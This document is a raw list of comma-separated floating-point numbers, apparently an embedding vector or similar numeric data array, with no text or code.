0.01580226793885231, 0.02194139175117016, 0.03476179763674736, -0.016360370442271233, -0.034570448100566864, -0.027809439226984978, -0.0004439902841113508, -0.019884387031197548, 0.006661349441856146, 0.015419568866491318, -0.011656364426016808, 0.015100653283298016, 0.01563483662903309, -0.015658754855394363, 0.007673906162381172, 0.002268287120386958, -0.01269284076988697, 0.0006193938897922635, 0.011321503669023514, 0.014167824760079384, 0.009790708310902119, -0.02688458375632763, -0.00426948256790638, -0.01162447314709425, 0.00930436234921217, -0.007869241759181023, 0.0035738477017730474, -0.02941996231675148, -0.0068646580912172794, -0.003627664875239134, 0.0019673104397952557, -0.0431811697781086, -0.0032130745239555836, -0.035654760897159576, 0.003751244628801942, 0.014319309964776039, 0.0037472581025213003, -0.00678492896258831, 0.010253136046230793, 0.014167824760079384, -0.009639224037528038, 0.0028403420001268387, 0.012924054637551308, -0.01725333370268345, -0.030137522146105766, -0.0016454050783067942, 0.00485947635024786, 0.004094078671187162, 0.036930423229932785, -0.01345823798328638, 0.0283675417304039, -0.027458632364869118, -0.007366950158029795, 0.0020948767196387053, 0.0009906315244734287, 0.0042774551548063755, 0.020171411335468292, -0.00001117294596042484, -0.014957141131162643, 0.024620283395051956, 0.02214868739247322, 0.025417571887373924, -0.003059596521779895, -0.02092086337506771, -0.019501687958836555, -0.009208687581121922, 0.0029997997917234898, -0.003785129403695464, -0.004664140287786722, -0.018098460510373116, 0.02465217560529709, 0.015523215755820274, -0.004568465985357761, -0.0036814818158745766, 0.007319112773984671, -0.007271275389939547, -0.018066568300127983, 0.008507072925567627, -0.018194133415818214, -0.0025473381392657757, 0.018752235919237137, 0.0002226180222351104, -0.007817418314516544, 0.0004347716458141804, -0.009152877144515514, -0.026342427358031273, -0.007901133969426155, 0.0215905848890543, -0.02565675973892212, 0.017843326553702354, 0.017970893532037735, -0.004628262482583523, -0.01865656115114689, 0.028208084404468536, 0.030918866395950317, 0.00036475970409810543, 0.02294597588479519, 0.017364954575896263, -0.003223040606826544, -0.0023480160161852837, -0.028511052951216698, 0.013872828334569931, 0.016647392883896828, -0.0000022229100977710914, 0.0019553510937839746, -0.012086900882422924, 0.0037352987565100193, 0.010460431687533855, 0.010380702093243599, 0.004488736856728792, -0.012286222539842129, 0.017651977017521858, -0.001978273270651698, 0.013856882229447365, 0.020155465230345726, 0.025098657235503197, -0.02884591557085514, 0.0188160203397274, 0.011823795735836029, 0.0031791897490620613, -0.04490331560373306, 0.014127960428595543, -0.020059790462255478, -0.01843332126736641, 0.007347017992287874, 0.0006801871350035071, 0.008044646121561527, 0.014821602031588554, -0.023137325420975685, 0.0068885767832398415, 0.027394849807024002, -0.014191743917763233, -0.013434318825602531, -0.024747850373387337, -0.00143113371450454, 0.05109027773141861, -0.012373925186693668, -0.014199716970324516, 0.009272471070289612, 0.011767985299229622, 0.03960931673645973, 0.014215662144124508, -0.0025592974852770567, 0.029563475400209427, -0.026246752589941025, -0.016129156574606895, -0.01227825041860342, 0.030743462964892387, -0.00434522470459342, -0.009208687581121922, -0.020123573020100594, 0.022483548149466515, 0.010819211602210999, -0.037536364048719406, 0.030312927439808846, 0.010747455060482025, 0.032162636518478394, -0.002045046305283904, -0.03511260449886322, 0.008032686077058315, -0.02999401092529297, 0.0008859873632900417, -0.0308550838381052, 0.013498102314770222, -0.004963123705238104, -0.01508470717817545, -0.034251533448696136, 0.01124974712729454, 0.012007172219455242, 0.002529399236664176, -0.04212874919176102, -0.011775958351790905, -0.006422162521630526, -0.015379704535007477, -0.001989235868677497, 0.0036834750790148973, -0.035878002643585205, -0.006178989540785551, -0.025162439793348312, 0.027028096839785576, 0.0009487738716416061, -0.01103447936475277, -0.01061988901346922, -0.007992821745574474, -0.007044048048555851, -0.0019354189280420542, -0.008762205950915813, -0.01581024006009102, 0.009057202376425266, -0.02079329639673233, 0.006661349441856146, 0.01311540324240923, -0.006473986431956291, 0.0019513648003339767, 0.015284029766917229, -0.016487935557961464, -0.0019344224128872156, -0.0022762599401175976, 0.030584005638957024, -0.01645604521036148, -0.0029539556708186865, -0.0205700546503067, -0.010141516104340553, 0.0017321102786809206, 0.015164435841143131, 0.0016812831163406372, 0.013522020541131496, -0.014805655926465988, -0.011672310531139374, -0.01210284698754549, -0.00035005967947654426, 0.005868047010153532, -0.006501891650259495, -0.009782735258340836, 0.018178189173340797, 0.003665535943582654, 0.006772969849407673, 0.004779747221618891, -0.017046038061380386, -0.006115206517279148, 0.016695231199264526, 0.0015826185699552298, -0.006250745616853237, -0.013187159784138203, -0.005106635857373476, 0.0362607017159462, 0.008016740903258324, -0.01899142377078533, 0.017269279807806015, -0.01916682720184326, 0.016790905967354774, -0.021463019773364067, -0.006362366024404764, 0.017891164869070053, 0.014853493310511112, -0.0002416782226646319, -0.022435711696743965, -0.012605139054358006, -0.014869439415633678, -0.024636229500174522, -0.000656268501188606, 0.023822994902729988, -0.010747455060482025, 0.007119790650904179, 0.007095871958881617, -0.0051664323545992374, 0.04994218051433563, 0.013848909176886082, -0.014933221973478794, -0.006222840398550034, -0.006426149047911167, -0.027155661955475807, -0.0035459427163004875, 0.005983653478324413, -0.005557104013860226, 0.011337448842823505, -0.005660751834511757, 0.0003104443894699216, -0.01672712340950966, 0.004919272847473621, -0.0015876016113907099, -0.005373727530241013, 0.02631053514778614, 0.008443290367722511, -0.006768983323127031, 0.01777954399585724, 0.02210085093975067, 0.02989833615720272, -0.010404621250927448, -0.004588398151099682, 0.0008291805279441178, -0.030360763892531395, -0.014590388163924217, 0.02237192913889885, 0.005979667417705059, -0.009360172785818577, 0.021829772740602493, -0.04037471488118172, -0.00851504597812891, 0.00011404969700379297, -0.012421762570738792, -0.017843326553702354, 0.013553912751376629, 0.0033127355854958296, 0.006190948653966188, -0.01097069587558508, -0.0013085504760965705, -0.027251336723566055, -0.022786518558859825, -0.01097069587558508, 0.0029419963248074055, -0.01948574185371399, -0.016615502536296844, -0.016695231199264526, -0.016583610326051712, 0.027155661955475807, -0.002049032598733902, 0.024524608626961708, -0.013577830977737904, -0.007614109665155411, 0.002045046305283904, 0.016440099105238914, -0.012963918969035149, -0.004496709909290075, -0.00468407291918993, -0.044456832110881805, 0.03511260449886322, -0.01698225550353527, 0.007040061522275209, 0.013370536267757416, -0.0029400030616670847, 0.0067769563756883144, -0.003615705529227853, -0.012852298095822334, -0.0094080101698637, -0.026725126430392265, -0.012525409460067749, 0.01345823798328638, 0.0028343622107058764, 0.014614306390285492, 0.019150881096720695, -0.0033366542775183916, -0.009120985865592957, 0.006565674673765898, -0.03527206555008888, -0.0021546734496951103, -0.008802070282399654, -0.0050149476155638695, 0.005433524493128061, 0.007669920101761818, -0.028957534581422806, -0.012549328617751598, -0.001469004899263382, 0.0028881793841719627, 0.007131749764084816, -0.00046267674770206213, 0.0009094077395275235, 0.024062180891633034, 0.009487738832831383, 0.026900529861450195, -0.0009931230451911688, 0.03348613530397415, -0.036834750324487686, -0.019581416621804237, 0.06104044243693352, -0.00951963011175394, -0.008068564347922802, -0.007793499622493982, -0.019374122843146324, 0.003653576597571373, 0.006868644617497921, -0.019996007904410362, -0.01297986414283514, -0.010037868283689022, 0.0002171366650145501, 0.007562285754829645, 0.013346617110073566, 0.03205101564526558, 0.024460826069116592, 0.002973887836560607, -0.0020241173915565014, -0.012995810247957706, 0.0189595315605402, -0.0232489462941885, -0.016033481806516647, 0.01512457150965929, -0.020554110407829285, -0.009288416244089603, 0.026167023926973343, 0.006055409554392099, -0.002304165158420801, -0.024189747869968414, -0.03370937705039978, 0.03980066627264023, -0.008435317315161228, 0.014327283017337322, -0.010460431687533855, -0.008961527608335018, -0.0009552518604323268, -0.033422354608774185, -0.015092680230736732, 0.004416980780661106, 0.030312927439808846, -0.00022174599871505052, -0.020107626914978027, 0.02044248953461647, 0.005158459767699242, -0.01606537215411663, -0.035750437527894974, -0.008961527608335018, -0.002738687675446272, -0.013585804030299187, 0.009511657059192657, 0.0021666327957063913, 0.00763005530461669, -0.01429539080709219, 0.007382895797491074, 0.014343228191137314, -0.014630252495408058, 0.016886580735445023, 0.011146100237965584, -0.0004362665640655905, -0.003356586443260312, -0.01873629167675972, 0.009447874501347542, 0.004428940359503031, -0.009264498017728329, 0.0037711767945438623, -0.006593579892069101, -0.015586999244987965, 0.0025393653195351362, -0.023567862808704376, -0.006458040792495012, -0.006621485110372305, -0.00456447945907712, 0.018241971731185913, 0.003023718483746052, 0.02937212586402893, 0.013601750135421753, -0.006537769455462694, -0.0012218453921377659, 0.01280446071177721, 0.01024516299366951, -0.01101056020706892, 0.004783733747899532, 0.020506272092461586, 0.0017460628878325224, 0.017046038061380386, 0.0026709181256592274, 0.0042296177707612514, 0.012254331260919571, 0.014861466363072395, 0.0023719347082078457, -0.020777350291609764, -0.016790905967354774, -0.0003371037309989333, -0.005987640004605055, 0.0009163839858956635, -0.005585009232163429, 0.012788514606654644, -0.0061989217065274715, -0.019071152433753014, -0.016663338989019394, 0.0021546734496951103, 0.013872828334569931, 0.002222442999482155, 0.029005372896790504, -0.004145902581512928, -0.0060155452229082584, 0.018640616908669472, -0.017364954575896263, -0.0038648582994937897, -0.004871435463428497, 0.0035000985953956842, -0.015068761073052883, -0.02192544750869274, -0.027649981901049614, -0.01044448558241129, 0.012397843413054943, 0.018241971731185913, 0.0033486136235296726, -0.0001737840793794021, 0.02123977802693844, 0.005293998867273331, -0.011018533259630203, -0.0026310535613447428, 0.0015925847692415118, -0.0010922858491539955, -0.014279445633292198, 0.0026848705019801855, 0.017109820619225502, -0.00888977199792862, -0.009862464852631092, -0.0007285227766260505, -0.019023314118385315, -0.00143611675594002, 0.0024616296868771315, -0.017891164869070053, -0.011154072359204292, -0.006007572170346975, 0.01624874956905842, 0.010540160350501537, -0.00456447945907712, -0.01138528622686863, 0.0017550323391333222, 0.0006507871439680457, 0.008347615599632263, -0.0033446273300796747, -0.02906915545463562, -0.015778347849845886, -0.003526010550558567, 0.012716758996248245, -0.00458441162481904, -0.01435917429625988, -0.017588194459676743, 0.01619293913245201, 0.009878410026431084, -0.0030556099954992533, -0.01750846579670906, 0.003256925381720066, 0.006123179104179144, 0.009742870926856995, 0.0038768176455050707, 0.006585606839507818, -0.023360567167401314, -0.005832168739289045, -0.01321905106306076, 0.0048395441845059395, 0.0062627047300338745, 0.004715964198112488, -0.007434719707816839, -0.008092482574284077, -0.02071356773376465, -0.0077376896515488625, -0.000801275426056236, 0.014072149991989136, -0.0024436907842755318, -0.019708983600139618, 0.0039007363375276327, -0.014638225547969341, 0.00629459647461772, -0.011775958351790905, -0.0031632438767701387, -0.005923856981098652, 0.00951963011175394, 0.001585608464665711, 0.025337843224406242, 0.00892963632941246, 0.019406013190746307, 0.011592581868171692, 0.020235193893313408, 0.005321904085576534, -0.006581620313227177, 0.00912895891815424, -0.016774959862232208, -0.003231013659387827, -0.0010574044426903129, -0.016759013757109642, 0.0007928042323328555, 0.002274266676977277, 0.009679088369011879, 0.0232489462941885, -0.018720345571637154, -0.013107430189847946, -0.002938009798526764, 0.016009561717510223, 0.012947972863912582, 0.0007668923353776336, -0.010532187297940254, -0.004823598079383373, 0.0005486344452947378, 0.007052021101117134, -0.004018336534500122, -0.023822994902729988, -0.005696629639714956, 0.021287616342306137, -0.004560492932796478, -0.013761207461357117, 0.03332667797803879, -0.0061032469384372234, -0.012549328617751598, -0.02127167023718357, -0.001008072285912931, 0.022579222917556763, 0.019230609759688377, -0.00491528632119298, 0.013673505745828152, 0.004177794326096773, 0.002730714622884989, -0.0035718546714633703, -0.012294195592403412, 0.0062387860380113125, 0.00128363526891917, 0.006509864237159491, -0.005796290934085846, 0.0042375908233225346, 0.0011859673541039228, -0.004572452045977116, -0.009487738832831383, -0.004133943468332291, -0.011241774074733257, -0.005409605801105499, -0.0033007762394845486, -0.00607534172013402, -0.019533580169081688, 0.016966309398412704, -0.01083515677601099, 0.004056207835674286, -0.004971096757799387, 0.003651583567261696, 0.004819612018764019, -0.016535773873329163, -0.020155465230345726, -0.005385687109082937, 0.035303954035043716, 0.010827184654772282, 0.005883992649614811, -0.008642612025141716, -0.0016214863862842321, -0.000045781827793689445, 0.04136335104703903, -0.008770179003477097, -0.000931831484194845, -0.015403622761368752, -0.009886383078992367, -0.018321700394153595, -0.0010803265031427145, -0.03485747426748276, -0.014630252495408058, -0.01645604521036148, 0.00808052346110344, 0.002232409082353115, 0.006792902015149593, 0.004731909837573767, 0.028973480686545372, -0.00629459647461772, -0.009503684937953949, -0.005186364520341158, -0.005943789146840572, -0.01961330883204937, -0.006605539005249739, -0.011736094020307064, -0.0017809441778808832, 0.006147097796201706, 0.017620086669921875, 0.006454054266214371, 0.015586999244987965, -0.010787319391965866, 0.014191743917763233, 0.0012567266821861267, -0.01221446692943573, -0.024349205195903778, 0.007406814489513636, -0.013490129262208939, -0.005963721312582493, 0.010261109098792076, -0.018544942140579224, -0.007618096191436052, 0.0012617098400369287, -0.030982648953795433, -0.011696228757500648, 0.006270677782595158, 0.006860671564936638, -0.0014919269597157836, 0.011177991516888142, -0.00869044940918684, 0.003651583567261696, 0.002268287120386958, -0.008251940831542015, 0.013920665718615055, 0.0019742867443710566, -0.0033386475406587124, -0.0027287215925753117, 0.0004574445483740419, 0.007785526569932699, 0.003928641323000193, -0.002764599397778511, 0.02811240963637829, -0.019708983600139618, -0.005397646222263575, -0.0481562539935112, -0.007522421423345804, 0.02337651327252388, -0.01948574185371399, 0.005286025814712048, 0.012318114750087261, -0.015315921045839787, -0.011608527041971684, -0.012573246844112873, -0.00530994450673461, 0.004803665913641453, 0.0012049030046910048, 0.005246161483228207, 0.021510856226086617, 0.00729918060824275, 0.0009378111572004855, -0.006916482001543045, 0.022834356874227524, 0.015403622761368752, -0.0037173598539084196, 0.014853493310511112, -0.005130554549396038, 0.004676099866628647, 0.014104042202234268, -0.0015397643437609076, -0.028303759172558784, -0.001752042560838163, -0.005186364520341158, -0.023567862808704376, -0.005090690217912197, -0.001652381382882595, 0.028957534581422806, -0.005768385715782642, -0.014749845489859581, -0.0015935812843963504, 0.003832966787740588, 0.004715964198112488, 0.034123968333005905, -0.0002239883760921657, -0.00002479070462868549, -0.010436512529850006, 0.010229217819869518, -0.04059795290231705, -0.009073148481547832, -0.0063264877535402775, 0.021686259657144547, 0.005317917559295893, -0.010994615033268929, -0.006493918597698212, 0.006473986431956291, 0.00572453485801816, -0.005010961089283228, 0.015874022617936134, 0.0035678681451827288, 0.009950166568160057, -0.0034442883916199207, 0.01442295778542757, -0.008180185221135616, -0.012660948559641838, 0.02004384435713291, -0.025513246655464172, 0.007518434897065163, 0.007980862632393837, -0.003223040606826544, -0.0061271656304597855, 0.025927837938070297, 0.013721343129873276, 0.022914085537195206, 0.024620283395051956, 0.009041257202625275, 0.0016772967064753175, -0.011345421895384789, 0.008371533825993538, -0.01956547051668167, -0.015100653283298016, -0.016121182590723038, 0.019708983600139618, 0.03960931673645973, -0.004827584605664015, 0.013864855282008648, 0.0079689035192132, -0.0024018329568207264, -0.012445680797100067, 0.004552519880235195, -0.0053498088382184505, -0.004875421989709139, -0.013434318825602531, -0.02771376445889473, 0.017651977017521858, 0.0463065430521965, -0.011752039194107056, -0.009089094586670399, -0.009878410026431084, 0.014893357641994953, -0.008427344262599945, -0.0013254928635433316, -0.013880801387131214, -0.008674504235386848, -0.012118792161345482, -0.024620283395051956, -0.01042056642472744, 0.029579421505331993, -0.00899341981858015, 0.018401429057121277, -0.011154072359204292, -0.01083515677601099, -0.04343630373477936, -0.015196328051388264, -0.009631250984966755, 0.015866050496697426, 0.007127763237804174, 0.01667928509414196, 0.012860271148383617, -0.012381897307932377, -0.0006343430140987039, -0.01602550782263279, -0.0014949168544262648, -0.02521027810871601, -0.004995015449821949, -0.00763005530461669, 0.0022662938572466373, 0.012916081584990025, 0.011783931404352188, 0.015523215755820274, -0.0024098060093820095, 0.007235397584736347, -0.009742870926856995, 0.013330671936273575, 0.005852100905030966, 0.010021922178566456, -0.022340036928653717, -0.00934422668069601, -0.027554307132959366, -0.006541755981743336, -0.03067968040704727, -0.02021924778819084, 0.001369343837723136, 0.0035977663937956095, -0.020075736567378044, -0.01873629167675972, -0.02189355529844761, -0.0197408739477396, 0.00020505275460891426, 0.007741675712168217, 0.014255526475608349, -0.014965114183723927, -0.007673906162381172, 0.017173605039715767, 0.0016932424623519182, -0.030089685693383217, -0.026167023926973343, -0.019820604473352432, -0.006585606839507818, -0.007845323532819748, -0.013625668361783028, 0.00542953796684742, -0.0006154074217192829, -0.027873221784830093, 0.006968305446207523, 0.013203104957938194, -0.003233006689697504, 0.0051504867151379585, -0.008730313740670681, -0.01816224306821823, 0.0009497705032117665, -0.003368545789271593, 0.02350407838821411, 0.025991620495915413, -0.0021885582245886326, -0.0034104036167263985, -0.013211078010499477, 0.013019728474318981, -0.009089094586670399, -0.014143906533718109, -0.0265656691044569, 0.00906517542898655, -0.01584213227033615, -0.005736493971198797, 0.022563278675079346, 0.006234799511730671, 0.004987042397260666, -0.010603942908346653, -0.01592983305454254, -0.027984842658042908, 0.0018267882987856865, 0.022483548149466515, -0.014024312607944012, -0.025640813633799553, 0.012405816465616226, -0.0032908101566135883, -0.00475981505587697, 0.0049511645920574665, 0.018720345571637154, 0.009687061421573162, -0.01777954399585724, -0.001333465799689293, -0.00527406670153141, -0.006980265025049448, 0.023009760305285454, 0.035782329738140106, 0.0023500092793256044, 0.014470795169472694, 0.006330474279820919, 0.003366552758961916, -0.0010354790138080716, -0.002208490390330553, 0.0028702402487397194, 0.01733306236565113, 0.00812437478452921, -0.0004317818093113601, 0.004072153475135565, 0.0029798676259815693, -0.016081318259239197, -0.00014488236047327518, 0.0004895852762274444, -0.0030914880335330963, 0.018098460510373116, 0.011329475790262222, -0.001547737163491547, 0.003492125775665045, -0.004424953833222389, -0.025592975318431854, -0.01383296400308609, -0.007933025248348713, 0.005541158374398947, 0.018273863941431046, 0.0022882192861288786, 0.0037193531170487404, 0.011026506312191486, 0.002146700629964471, -0.0017370933201164007, 0.012501491233706474, -0.0008590788347646594, -0.02004384435713291, -0.007052021101117134, 0.00672911899164319, -0.0006438108393922448, 0.003428342519327998, 0.009886383078992367, -0.015339840203523636, -0.008188157342374325, 0.0022782532032579184, -0.010197325609624386, -0.010364756919443607, 0.004369143396615982, -0.01707793027162552, 0.011457042768597603, -0.01597767136991024, -0.013466211035847664, -0.022834356874227524, -0.02079329639673233, -0.005784331355243921, -0.005222242791205645, 0.0240302886813879, 0.009400037117302418, -0.023264892399311066, 0.005808250047266483, -0.011162045411765575, -0.008523019030690193, -0.020729513838887215, 0.005816223099827766, -0.011409205384552479, 0.010253136046230793, 0.03012157790362835, -0.030568059533834457, -0.004688058979809284, 0.016344424337148666, 0.003651583567261696, 0.01913493499159813, 0.008044646121561527, -3.270130548571615e-7, -0.03559098020195961, -0.0015018930425867438, -0.011783931404352188, -0.01860872469842434, 0.021128157153725624, -0.0058401417918503284, 0.0051544732414186, -0.007638028357177973, 0.02691647596657276, 0.0036555698607116938, -0.0042774551548063755, -0.01124974712729454, -0.00930436234921217, -0.005158459767699242, -0.025162439793348312, -0.008483154699206352, -0.014869439415633678, -0.0037352987565100193, -0.018098460510373116, -0.003799082012847066, -0.0037352987565100193, 0.008180185221135616, 0.015172408893704414, -0.0030536167323589325, -0.004020329564809799, -0.010045841336250305, 0.0128682442009449, -0.002049032598733902, 0.011345421895384789, 0.00003143996946164407, 0.022643007338047028, -0.020251139998435974, -0.007430733181536198, -0.02136734500527382, 0.014725927263498306, -0.015196328051388264, 0.0011590588837862015, 0.01356985792517662, 0.009710979647934437, -0.007494516205042601, -0.0018457239493727684, 0.013083511963486671, 0.012126765213906765, -0.009439901448786259, 0.005405619274824858, 0.021112211048603058, -0.007323099300265312, 0.0012926047202199697, 0.015451460145413876, -0.003033684566617012, -0.01667928509414196, 0.024747850373387337, -0.01138528622686863, 0.007933025248348713, -0.021032482385635376, 0.002304165158420801, -0.010595970787107944, -0.0007873228751122952, -0.0027406809385865927, -0.010587997734546661, -0.003380505135282874, -0.04767788201570511, 0.004628262482583523, 0.00015385185542982072, 0.002469602506607771, 0.004337252117693424, 0.006964318919926882, 0.012461626902222633, -0.007885187864303589, 0.020873025059700012, 0.006390271242707968, -0.007646001409739256, 0.013537966646254063, 0.010293000377714634, -0.020330868661403656, -0.0025433518458157778, -0.04212874919176102, 0.033071547746658325, 0.006757024209946394, 0.003346620360389352, -0.02001195400953293, -0.005002988502383232, 0.0008351602009497583, 0.003352600149810314, -0.00232011079788208, -0.0041897534392774105, -0.008706395514309406, -0.020809242501854897, 0.005883992649614811, -0.008068564347922802, 0.023009760305285454, 0.0040542143397033215, 0.021861663088202477, 0.01142515055835247, -0.019406013190746307, -0.026629451662302017, -0.0012308148434385657, 0.001022523152641952, 0.008148293010890484, -0.003972492180764675, -0.022212469950318336, 0.011568662710487843, -0.01843332126736641, 0.011433123610913754, 0.012517436407506466, 0.017970893532037735, -0.011807849630713463, 0.00658959336578846, -0.008483154699206352, -0.006529796868562698, -0.018624670803546906, -0.016392260789871216, 0.007052021101117134, -0.0001815078139770776, -0.008016740903258324, -0.008650585077702999, 0.026422156020998955, 0.006517837289720774, 0.02232409082353115, 0.005652778781950474, 0.011512852273881435, 0.022292200475931168, 0.0030117591377347708, 0.012597166001796722, -0.011760012246668339, -0.015315921045839787, -0.023233000189065933, -0.003954553510993719, -0.004692045506089926, -0.029834553599357605, 0.02127167023718357, 0.005740480497479439, 0.012007172219455242, -0.02136734500527382, -0.001925452845171094, 0.006079328246414661, 0.018704399466514587, 0.03724934160709381, -0.008315724320709705, 0.001528801629319787, -0.006916482001543045, 0.013362563215196133, 0.0029818606562912464, 0.0034143899101763964, 0.00045844115084037185, -0.0038887769915163517, -0.020522218197584152, -0.0021626462694257498, -0.02312137931585312, -0.021000592038035393, 0.0072872210294008255, -0.027554307132959366, -0.016663338989019394, -0.02096869982779026, -0.00930436234921217, -0.009878410026431084, 0.017173605039715767, 0.004743869416415691, 0.00005060916373622604, -0.023583807051181793, -0.008395452983677387, -0.0039027296006679535, 0.008204103447496891, -0.02500298246741295, 0.0018437306862324476, -0.018194133415818214, -0.02661350555717945, 0.02337651327252388, 0.018895749002695084, 0.0019394054543226957, 0.003197128651663661, -0.011050425469875336, -0.01024516299366951, 0.016535773873329163, -0.010061786510050297, 0.001029499340802431, 0.016208885237574577, -0.002258321037515998, -0.0067769563756883144, 0.017620086669921875, -0.023392457515001297, -0.014048231765627861, 0.015315921045839787, 0.0024496703408658504, -0.029866443946957588, 0.016711177304387093, 0.00995813962072134, 0.0004851004923693836, -0.003992424346506596, 0.004552519880235195, -0.0019354189280420542, 0.023344621062278748, 0.024333259090781212, 0.0008142313454300165, 0.022930031642317772, 0.007761607877910137, 0.0005227226065471768, 0.020235193893313408, -0.010500296019017696, 0.007933025248348713, 0.007709784433245659, 0.008020726963877678, -0.010675699450075626, -0.00001666209391260054, -0.0028443282935768366, 0.0037113800644874573, 0.018401429057121277, 0.02425353042781353, 0.004775760695338249, 0.004711977671831846, 0.0058640604838728905, -0.018592778593301773, -0.00542953796684742, 0.005668724421411753, -0.01044448558241129, -0.025465410202741623, -0.006597566418349743, 0.0030795286875218153, -0.001462028594687581, -0.008786124177277088, 0.0022124769166111946, 0.01624077558517456, 0.024939198046922684, 0.016663338989019394, -0.02004384435713291, -0.00458441162481904, -0.0005506277084350586, 0.01663144864141941, 0.014263499528169632, -0.034347210079431534, -0.0009487738716416061, -0.006920468062162399, 0.0431811697781086, 0.0049750832840800285, 0.0051903510466217995, 0.0006781939300708473, 0.0022184564732015133, 0.005042852833867073, -0.008961527608335018, 0.023870831355452538, 0.0010853096609935164, 0.006697227247059345, -0.005230215843766928, -0.00808052346110344, -0.013234997168183327, 0.0010942791122943163, 0.02639026567339897, 0.00006147845124360174, -0.01148893404752016, 0.007362963631749153, -0.004161848220974207, 0.006246759090572596, 0.008475181646645069, 0.009288416244089603, -0.014877412468194962, -0.014622279442846775, -0.008387479931116104, -0.013195132836699486, 0.001614510198123753, -0.006246759090572596, -0.021048428490757942, 0.010005977004766464, 0.00936814583837986, 0.029882390052080154, 0.002084910636767745, -0.014861466363072395, 0.003613712266087532, -0.004209685605019331, 0.007897146977484226, 0.008945582434535027, 0.03077535331249237, -0.0060155452229082584, 0.01109826285392046, 0.008905718103051186, -0.013912692666053772, -0.0010035875020548701, 0.024094073101878166, 0.0007888177642598748, 0.006322501692920923, 0.005242174956947565, 0.014614306390285492, 0.008307751268148422, 0.024843525141477585, 0.03310343623161316, 0.0007220448460429907, 0.01335459016263485, 0.0035738477017730474, -0.001020031631924212, -0.0007001193589530885, 0.008698422461748123, -0.014430929906666279, -0.01131353061646223, -0.015905914828181267, -0.004636235535144806, -0.004133943468332291, 0.010149488225579262, 0.016934417188167572, -0.04219253361225128, -0.016615502536296844, -0.008961527608335018, 0.003258918644860387, 0.00468407291918993, 0.0003779648104682565, 0.002196531044319272, 0.005206297151744366, 0.0020629852078855038, 0.011927442625164986, 0.0006776956142857671, 0.010715563781559467, 0.02455650083720684, 0.005704602692276239, 0.01238987036049366, -0.004353197757154703, -0.020873025059700012, -0.00851504597812891, -0.0025732500944286585, -0.018098460510373116, -0.022930031642317772, 0.015499297529459, -0.021526802331209183, -0.013936610892415047, -0.006282636895775795, -0.0068487124517560005, 0.01755630224943161, 0.009647196158766747, 0.026693234220147133, -0.009631250984966755, 0.006242772564291954, -0.014247553423047066, 0.0003111918631475419, -0.017221441492438316, -0.004971096757799387, -0.0007175600621849298, -0.023089488968253136, -0.0034721933770924807, -0.011983253061771393, -0.01238987036049366, -0.004799679387360811, 0.004133943468332291, 0.0006577633903361857, 0.008355588652193546, -0.001410204917192459, -0.021351398900151253, 0.005297985393553972, 0.014143906533718109, 0.019724929705262184, -0.0022623075637966394, -0.01883196458220482, -0.010396648198366165, -0.01589794270694256, 0.005967707838863134, 0.0005506277084350586, -0.005369741003960371, -0.024157855659723282, 0.016487935557961464, 0.010436512529850006, 0.019326284527778625, -0.015905914828181267, 0.00941598229110241, 0.008016740903258324, 0.007347017992287874, -0.011170018464326859, -0.006836752872914076, 0.00895355548709631, 0.0038927632849663496, 0.0066892546601593494, 0.024110019207000732, -0.0009333263733424246, 0.007777553983032703, 0.012405816465616226, 0.025927837938070297, -0.007307153195142746, -0.012932026758790016, -0.007956943474709988, -0.004106038250029087, -0.010603942908346653, -0.00411401130259037, -0.010564078576862812, 0.0026310535613447428, 0.00018873324734158814, -0.008156266063451767, 0.007825391367077827, 0.01107434369623661, 0.00853896513581276, -0.02513054758310318, 0.00006808100442867726, 0.0050627849996089935, -0.010715563781559467, -0.004173807799816132, 0.001350408187136054, 0.007291207555681467, -0.01685468852519989, -0.011520825326442719, -0.01581024006009102, 0.012684867717325687, 0.016169020906090736, -0.008969500660896301, -0.0049990019761025906, 0.023807048797607422, -0.018226025626063347, 0.007992821745574474, -0.0025134533643722534, 0.008658558130264282, 0.030982648953795433, 0.02508271113038063, -0.013274861499667168, 0.00029350200202316046, -0.022308144718408585, -0.009974084794521332, 0.0029898337088525295, 0.019724929705262184, -0.007123776711523533, 0.001455052406527102, -0.020283032208681107, 0.001949371537193656, -0.011552717536687851, -0.020729513838887215, -0.007482557091861963, -0.020123573020100594, 0.007554313167929649, -0.019852494820952415, 0.020809242501854897, 0.005736493971198797, 0.013785126619040966, 0.01518835499882698, -0.027219444513320923, 0.01470998115837574, 0.011911497451364994, 0.026852691546082497, -0.017237387597560883, 0.00025077228201553226, 0.02618297003209591, -0.010293000377714634, 0.016137128695845604, 0.036579616367816925, -0.002060991944745183, -0.015315921045839787, 0.02876618690788746, 0.00014388574345503002, -0.003440301865339279, -0.0024995009880512953, 0.01044448558241129, -0.005772372242063284, 0.007506475783884525, 0.01131353061646223, 0.0017659950535744429, -0.002367948181927204, -0.01961330883204937, -0.011026506312191486, -0.02819213829934597, 0.028606727719306946, 0.008921663276851177, -0.024046234786510468, -0.005680684000253677, 0.0039027296006679535, 0.018098460510373116, 0.006218853872269392, 0.007562285754829645, 0.011066370643675327, -0.019948169589042664, -0.025194332003593445, 0.005561090540140867, -0.02902131900191307, -0.005282039288431406, -0.005828182213008404, 0.007438706234097481, -0.008235994726419449, -0.0079689035192132, 0.00099860446061939, -0.0028403420001268387, -0.01006975956261158, 0.003697427688166499, 0.007502489257603884, 0.014135933481156826, -0.021654369309544563, 0.007753635291010141, 0.016360370442271233, 0.005162446293979883, -0.012246358208358288, -0.04790112003684044, 0.017827380448579788, -0.00983057264238596, -0.008419371210038662, 0.002186564961448312, -0.019230609759688377, 0.01913493499159813, -0.01655171811580658, 0.005026906728744507, 0.0017151678912341595, -0.006860671564936638, -0.006577633786946535, -0.0005595972179435194, -0.006390271242707968, 0.00971895270049572, 0.008387479931116104, 0.002788518089801073, -0.0024955144617706537, 0.027602143585681915, -0.012326087802648544, 0.011496907100081444, 0.014717954210937023, -0.005178391933441162, 0.003123379545286298, -0.002096869982779026, -0.009160850197076797, 0.0275383610278368, -0.0015397643437609076, -0.004835557658225298, 0.018624670803546906, -0.007502489257603884, 0.009591386653482914, 0.004524615127593279, 0.008961527608335018, 0.024141909554600716, 0.009272471070289612, -0.005258120596408844, -0.0021187954116612673, -0.022866247221827507, -0.009591386653482914, -0.01795494742691517, -0.014199716970324516, -0.02508271113038063, -0.014646198600530624, 0.02337651327252388, -0.0011191944358870387, -0.0015278049977496266, 0.01707793027162552, 0.017667923122644424, 0.004488736856728792, -0.0283197034150362, -0.0071357362903654575, 0.004612316843122244, -0.007295194081962109, 0.004995015449821949, -0.012445680797100067, 0.016519827768206596, 0.01280446071177721, 0.00462028943002224, -0.014510659500956535, 0.0058401417918503284, -0.002641019644215703, -0.0006627464317716658, 